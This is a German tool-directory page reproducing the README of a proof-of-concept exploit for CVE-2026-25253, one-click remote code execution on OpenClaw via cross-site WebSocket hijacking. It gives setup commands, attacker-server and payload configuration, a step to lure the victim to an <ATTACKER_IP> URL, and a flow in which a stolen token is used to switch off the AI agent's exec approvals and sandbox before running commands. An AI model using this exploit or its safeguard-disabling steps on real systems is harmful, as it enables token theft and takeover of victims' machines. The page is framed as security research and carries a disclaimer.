Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25253-research — Proof-of-Concept-Exploit für CVE-2026-25253, der eine One-Click-RCE auf OpenClaw über Cross-Site WebSocket Hijacking demonstriert. Enthält Angreifer-Server und browserbasierten Payload zum Stehlen von Tokens und Ausführen von Befehlen. | Kitploit
Tools/GitHubGitHub/al4n4n/cve-2026-25253-research
AufklärungExploitationWebanwendungs-ExploitationWebsicherheitRed TeamingPayload-Entwicklung
GitHubal4n4n/cve-2026-25253-research

CVE-2026-25253-research

Proof-of-Concept-Exploit für CVE-2026-25253, der eine One-Click-RCE auf OpenClaw über Cross-Site WebSocket Hijacking demonstriert. Enthält Angreifer-Server und browserbasierten Payload zum Stehlen von Tokens und Ausführen von Befehlen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
71vor 6 MonatenNoch nicht geprüft

CVE-2026-25253 Proof of Concept

One-Click-RCE auf OpenClaw per Cross-Site WebSocket Hijacking.

HAFTUNGSAUSSCHLUSS: Dieser Code wird ausschließlich für autorisierte Sicherheitsforschung und zu Bildungszwecken bereitgestellt. Die Verwendung dieses Codes gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal und unethisch. Der Autor übernimmt keine Haftung für Missbrauch.

Blog

Lesen Sie die detaillierte Analyse für eine Aufschlüsselung dieser Schwachstelle auf Quellcode-Ebene und wie dieser PoC aufgebaut wurde.

Voraussetzungen

  • Node.js (v18 oder neuer)
  • Eine laufende OpenClaw-Instanz mit dem Gateway auf dem Opfer-Rechner (Standard: localhost:18789)
  • Das Opfer muss ein aktives Auth-Token im Browser gespeichert haben (d. h., es hat die Control UI bereits verwendet)

Node.js installieren

macOS (Homebrew):

root@kitploit:~
brew install node

Ubuntu / Debian:

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs

Windows:

Laden Sie das Installationsprogramm von https://nodejs.org/ herunter und folgen Sie den Anweisungen.

Installation überprüfen:

root@kitploit:~
node -v
npm -v

Einrichtung

root@kitploit:~
git clone https://github.com/al4n4n/CVE-2026-25253-research.git
cd CVE-2026-25253-research
npm install

Dadurch wird die einzige Abhängigkeit installiert: ws (WebSocket-Bibliothek).

Konfiguration

Bearbeiten Sie den Anfang von exploit.html, um ihn an Ihre Umgebung anzupassen:

root@kitploit:~
const LOCAL_SCHEME = 'http';                // Schema der Control UI des Opfers
const GATEWAY_URL = 'ws://127.0.0.1:18789'; // Lokales Gateway des Opfers
const ATTACKER_WS_PORT = 8080;              // WS-Port des Angreifers (muss mit attacker-server.js übereinstimmen)
const ATTACKER_SCHEME = 'ws';               // Verwenden Sie 'wss' hinter TLS
const COMMAND = 'touch /tmp/success';       // Befehl, der auf dem Host des Opfers ausgeführt wird

Bearbeiten Sie den Anfang von attacker-server.js, falls Sie andere Ports benötigen:

root@kitploit:~
const HTTP_PORT = 3000;  // Stellt exploit.html bereit
const WS_PORT = 8080;    // Erfasst gestohlene Tokens

Ausführung

1. Angreifer-Server starten

root@kitploit:~
node attacker-server.js

Sie sollten Folgendes sehen:

root@kitploit:~
============================================================
CVE-2026-25253 Attack Server
============================================================

[HTTP]  Exploit-Seite: http://0.0.0.0:3000/exploit.html
[WS]    Token-Erfassung: ws://0.0.0.0:8080

Warten auf Opfer...

2. Das Opfer ködern

Senden Sie dem Opfer die folgende URL (ersetzen Sie <ATTACKER_IP> durch Ihre IP):

root@kitploit:~
http://<ATTACKER_IP>:3000/exploit.html

Das Opfer muss diesen Link in einem Browser öffnen, in dem es zuvor die OpenClaw Control UI verwendet hat (damit das Auth-Token in localStorage vorhanden ist).

3. Was passiert

root@kitploit:~
┌──────────────────────────────────────────────────────────────────────────┐
│                          EXPLOIT-ABLAUF                                  │
├──────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  1. Opfer besucht http://<attacker>:3000/exploit.html                    │
│     │                                                                    │
│  2. Seite öffnet Popup: http://127.0.0.1:18789?gatewayUrl=ws://<attacker>│
│     │                                                                    │
│  3. Control UI im Popup liest Token aus localStorage                     │
│     und sendet es über gatewayUrl an den WS-Server des Angreifers        │
│     │                                                                    │
│  4. Angreifer-Server lehnt erste Verbindung ab (Geräte-Token)            │
│     Control UI wiederholt mit Einstellungs-Token → ERFASST               │
│     │                                                                    │
│  5. exploit.html öffnet EIGENE WebSocket zu ws://127.0.0.1:18789         │
│     (Cross-Site WebSocket Hijacking - keine Origin-Validierung)          │
│     │                                                                    │
│  6. Authentifiziert sich mit gestohlenem Token, deaktiviert Sicherheit:  │
│     • exec.approvals.set → ask: "off"                                    │
│     • config.patch → host: "gateway", sandbox.mode: "off"                │
│     │                                                                    │
│  7. Sendet Agent-Befehl → RCE auf dem Host des Opfers                    │
│                                                                          │
└──────────────────────────────────────────────────────────────────────────┘

4. Überprüfung

Überprüfen Sie auf dem Opfer-Rechner, ob der Befehl ausgeführt wurde:

root@kitploit:~
ls -la /tmp/success

Dateien

DateiBeschreibung
attacker-server.jsHTTP-Server (stellt Exploit-Seite bereit) + WebSocket-Server (erfasst gestohlene Tokens)
exploit.htmlBrowserbasierte Exploit-Payload, die Tokens stiehlt, WebSocket entführt, Sicherheit deaktiviert und Befehle ausführt
Tool herunterladen
package.jsonNode.js-Abhängigkeiten (ws)